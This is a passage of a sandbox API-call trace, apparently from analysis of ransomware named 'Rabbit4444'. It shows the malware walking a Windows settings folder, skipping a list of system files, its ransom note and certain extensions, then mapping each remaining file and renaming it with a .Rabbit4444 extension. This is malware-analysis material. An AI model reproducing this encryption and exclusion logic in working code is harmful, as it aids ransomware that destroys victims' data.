"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_start_storerecentlyopeneditems.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.031] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab71ca1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3ab71ca1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", cAlternateFileName="AA6720~1.SET")) returned 1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2=".") returned 1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="..") returned 1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="windows") returned -1 [0058.031] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.032] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.032] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="boot") returned -1 [0058.032] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.032] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.032] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms" | out: lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms") returned="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms" [0058.032] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.032] lstrlenW (lpString="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms") returned 82 [0058.032] lstrlenW (lpString="Rabbit4444") returned 10 [0058.032] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.032] lstrlenW (lpString=".dll") returned 4 [0058.032] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.032] lstrlenW (lpString=".lnk") returned 4 [0058.032] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.032] lstrlenW (lpString=".ini") returned 4 [0058.032] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.032] lstrlenW (lpString=".sys") returned 4 [0058.032] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.032] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink-2.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.033] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.033] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14934364759) returned 1 [0058.033] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1349) returned 1 [0058.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0058.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.033] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0058.034] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0058.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.035] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.035] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14934601036) returned 1 [0058.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0058.035] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.035] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.035] CloseHandle (hObject=0x298) returned 1 [0058.036] CloseHandle (hObject=0x278) returned 1 [0058.036] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms.Rabbit4444") returned 210 [0058.036] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink-2.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-2.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink-2.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.036] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acef455, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3acef455, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", cAlternateFileName="AAF5CD~1.SET")) returned 1 [0058.036] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.036] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2=".") returned 1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="..") returned 1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="windows") returned -1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="boot") returned -1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.037] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.037] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms" | out: lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms") returned="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms" [0058.037] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.037] lstrlenW (lpString="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms") returned 82 [0058.037] lstrlenW (lpString="Rabbit4444") returned 10 [0058.037] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.037] lstrlenW (lpString=".dll") returned 4 [0058.037] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.037] lstrlenW (lpString=".lnk") returned 4 [0058.037] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.037] lstrlenW (lpString=".ini") returned 4 [0058.037] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.037] lstrlenW (lpString=".sys") returned 4 [0058.037] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.037] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink-3.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.038] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.038] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14934840817) returned 1 [0058.038] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1349) returned 1 [0058.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0058.038] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0058.039] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0058.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.040] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14935095501) returned 1 [0058.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.040] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0058.040] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.040] CloseHandle (hObject=0x298) returned 1 [0058.040] CloseHandle (hObject=0x278) returned 1 [0058.041] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms.Rabbit4444") returned 210 [0058.041] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink-3.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink-3.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink-3.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.041] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3af77c46, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3af77c46, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", cAlternateFileName="AA6C1D~1.SET")) returned 1 [0058.041] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.041] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2=".") returned 1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="..") returned 1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="windows") returned -1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="boot") returned -1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.042] lstrcmpiW (lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.042] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms" | out: lpString1="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms") returned="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms" [0058.042] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.042] lstrlenW (lpString="AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms") returned 80 [0058.042] lstrlenW (lpString="Rabbit4444") returned 10 [0058.042] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.042] lstrlenW (lpString=".dll") returned 4 [0058.042] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.042] lstrlenW (lpString=".lnk") returned 4 [0058.042] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.042] lstrlenW (lpString=".ini") returned 4 [0058.042] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.042] lstrlenW (lpString=".sys") returned 4 [0058.042] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.043] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.043] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14935451044) returned 1 [0058.044] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1341) returned 1 [0058.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.044] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0058.046] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0058.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.047] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.047] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.047] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.047] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.047] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14935813952) returned 1 [0058.047] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.047] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.047] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.048] CloseHandle (hObject=0x298) returned 1 [0058.048] CloseHandle (hObject=0x278) returned 1 [0058.048] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms.Rabbit4444") returned 208 [0058.048] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_StorageSense_AppSizesOptionalComponentsLink.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_storagesense_appsizesoptionalcomponentslink.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.049] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b0cf166, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b0cf166, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x52b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", cAlternateFileName="AA7784~1.SET")) returned 1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2=".") returned 1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="..") returned 1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="windows") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="bootmgr") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="boot") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.049] lstrcmpiW (lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.049] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms" | out: lpString1="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms") returned="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms" [0058.049] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.049] lstrlenW (lpString="AAA_SystemSettings_SyncSettings_SyncAccessibility_Toggle.settingcontent-ms") returned 74 [0058.049] lstrlenW (lpString="Rabbit4444") returned 10 [0058.049] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.050] lstrlenW (lpString=".dll") returned 4 [0058.050] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.050] lstrlenW (lpString=".lnk") returned 4 [0058.050] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.050] lstrlenW (lpString=".ini") 